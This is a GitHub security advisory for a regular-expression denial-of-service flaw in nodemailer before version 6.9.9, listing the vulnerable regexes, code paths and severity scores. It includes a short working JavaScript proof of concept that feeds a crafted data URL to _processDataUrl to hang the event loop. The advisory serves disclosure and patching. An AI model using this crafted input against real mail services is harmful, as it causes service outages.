GHSA-9h6g-pr28-7cqp – nodemailer

Package

Manager: npm
Name: nodemailer
Vulnerable Version: >=0 <6.9.9

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

nodemailer ReDoS when trying to send a specially crafted email ### Summary A ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter `attachDataUrls` set, causing the stuck of event loop. Another flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop. ### Details Regex: /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/ Path: compile -> getAttachments -> _processDataUrl Regex: /(<img\b[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/ Path: _convertDataImages ### PoC https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6 https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698 ```js async function exploit() { const MailComposer = require(\"nodemailer/lib/mail-composer\"); const MailComposerObject = new MailComposer(); // Create a malicious data URL that will cause excessive backtracking // This data URL is crafted to have a long sequence of characters that will cause the regex to backtrack const maliciousDataUrl = 'data:image/png;base64,' + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '=='; // Call the vulnerable method with the crafted input const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl }); } await exploit(); ``` ### Impact ReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.

Metadata

Created: 2024-01-31T22:42:54Z
Modified: 2025-09-03T15:21:03Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json
CWE IDs: ["CWE-1333"]
Alternative ID: N/A
Finding: F211
Auto approve: 1